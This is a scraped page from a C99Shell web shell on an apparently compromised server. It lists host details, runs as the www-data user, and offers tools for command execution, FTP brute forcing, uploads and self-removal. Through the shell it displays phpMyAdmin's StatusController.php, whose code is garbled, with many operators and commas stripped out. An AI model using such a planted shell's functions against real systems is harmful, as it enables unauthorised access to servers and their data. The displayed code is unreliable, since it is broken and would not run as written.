!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/libraries/classes/Controllers/Server/Status/   drwxr-xr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     StatusController.php (7.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin\Controllers\Server\Status;

use 
PhpMyAdmin\DatabaseInterface;
use 
PhpMyAdmin\ReplicationGui;
use 
PhpMyAdmin\Response;
use 
PhpMyAdmin\Server\Status\Data;
use 
PhpMyAdmin\Template;
use 
PhpMyAdmin\Url;
use 
PhpMyAdmin\Util;
use function 
implode;

/**
 * Object the server status page: processes, connections and traffic.
 */
class StatusController extends AbstractController
{
    
/** @var ReplicationGui */
    
private $replicationGui;

    
/** @var DatabaseInterface */
    
private $dbi;

    
/**
     * @param Response          $response
     * @param Data              $data
     * @param DatabaseInterface $dbi
     */
    
public function __construct($responseTemplate $template$dataReplicationGui $replicationGui$dbi)
    {
        
parent::__construct($response$template$data);
        
$this->replicationGui $replicationGui;
        
$this->dbi $dbi;
    }

    public function 
index(): void
    
{
        global 
$err_url;

        
$err_url Url::getFromRoute('/');

        if (
$this->dbi->isSuperUser()) {
            
$this->dbi->selectDb('mysql');
        }

        
$replicationInfo $this->data->getReplicationInfo();
        
$primaryInfo $replicationInfo->getPrimaryInfo();
        
$replicaInfo $replicationInfo->getReplicaInfo();

        
$traffic = [];
        
$connections = [];
        
$replication '';
        if (
$this->data->dataLoaded) {
            
// In some case the data was reported not to exist, check it for all keys
            
if (isset($this->data->status['Bytes_received'], $this->data->status['Bytes_sent'])) {
                
$networkTraffic implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_received'] + $this->data->status['Bytes_sent'],
                        
3,
                        
1
                    
)
                );
            }
            if (isset(
$this->data->status['Uptime'])) {
                
$uptime Util::timespanFormat($this->data->status['Uptime']);
            }
            
$startTime Util::localisedDate($this->getStartTime());

            
$traffic $this->getTrafficInfo();

            
$connections $this->getConnectionsInfo();

            if (
$primaryInfo['status']) {
                
$replication .= $this->replicationGui->getHtmlForReplicationStatusTable('master');
            }
            if (
$replicaInfo['status']) {
                
$replication .= $this->replicationGui->getHtmlForReplicationStatusTable('slave');
            }
        }

        
$this->render('server/status/status/index', [
            
'is_data_loaded' => $this->data->dataLoaded,
            
'network_traffic' => $networkTraffic ?? null,
            
'uptime' => $uptime ?? null,
            
'start_time' => $startTime ?? null,
            
'traffic' => $traffic,
            
'connections' => $connections,
            
'is_master' => $primaryInfo['status'],
            
'is_slave' => $replicaInfo['status'],
            
'replication' => $replication,
        ]);
    }

    private function 
getStartTime(): int
    
{
        return (int) 
$this->dbi->fetchValue(
            
'SELECT UNIX_TIMESTAMP() - ' $this->data->status['Uptime']
        );
    }

    
/**
     * @return array
     */
    
private function getTrafficInfo(): array
    {
        
$hourFactor 3600 $this->data->status['Uptime'];

        return [
            [
                
'name' => __('Received'),
                
'number' => implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_received'],
                        
3,
                        
1
                    
)
                ),
                
'per_hour' => implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_received'] * $hourFactor,
                        
3,
                        
1
                    
)
                ),
            ],
            [
                
'name' => __('Sent'),
                
'number' => implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_sent'],
                        
3,
                        
1
                    
)
                ),
                
'per_hour' => implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_sent'] * $hourFactor,
                        
3,
                        
1
                    
)
                ),
            ],
            [
                
'name' => __('Total'),
                
'number' => implode(
                    
' ',
                    
Util::formatByteDown(
                        
$this->data->status['Bytes_received'] + $this->data->status['Bytes_sent'],
                        
3,
                        
1
                    
)
                ),
                
'per_hour' => implode(
                    
' ',
                    
Util::formatByteDown(
                        (
$this->data->status['Bytes_received'] + $this->data->status['Bytes_sent']) * $hourFactor,
                        
3,
                        
1
                    
)
                ),
            ],
        ];
    }

    
/**
     * @return array
     */
    
private function getConnectionsInfo(): array
    {
        
$hourFactor 3600 $this->data->status['Uptime'];

        
$failedAttemptsPercentage '---';
        
$abortedPercentage '---';
        if (
$this->data->status['Connections'] > 0) {
            
$failedAttemptsPercentage Util::formatNumber(
                
$this->data->status['Aborted_connects'] * 100 $this->data->status['Connections'],
                
0,
                
2,
                
true
            
) . '%';

            
$abortedPercentage Util::formatNumber(
                
$this->data->status['Aborted_clients'] * 100 $this->data->status['Connections'],
                
0,
                
2,
                
true
            
) . '%';
        }

        return [
            [
                
'name' => __('Max. concurrent connections'),
                
'number' => Util::formatNumber(
                    
$this->data->status['Max_used_connections'],
                    
0
                
),
                
'per_hour' => '---',
                
'percentage' => '---',
            ],
            [
                
'name' => __('Failed attempts'),
                
'number' => Util::formatNumber(
                    
$this->data->status['Aborted_connects'],
                    
4,
                    
1,
                    
true
                
),
                
'per_hour' => Util::formatNumber(
                    
$this->data->status['Aborted_connects'] * $hourFactor,
                    
4,
                    
2,
                    
true
                
),
                
'percentage' => $failedAttemptsPercentage,
            ],
            [
                
'name' => __('Aborted'),
                
'number' => Util::formatNumber(
                    
$this->data->status['Aborted_clients'],
                    
4,
                    
1,
                    
true
                
),
                
'per_hour' => Util::formatNumber(
                    
$this->data->status['Aborted_clients'] * $hourFactor,
                    
4,
                    
2,
                    
true
                
),
                
'percentage' => $abortedPercentage,
            ],
            [
                
'name' => __('Total'),
                
'number' => Util::formatNumber(
                    
$this->data->status['Connections'],
                    
4,
                    
0
                
),
                
'per_hour' => Util::formatNumber(
                    
$this->data->status['Connections'] * $hourFactor,
                    
4,
                    
2
                
),
                
'percentage' => Util::formatNumber(10002) . '%',
            ],
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0049 ]--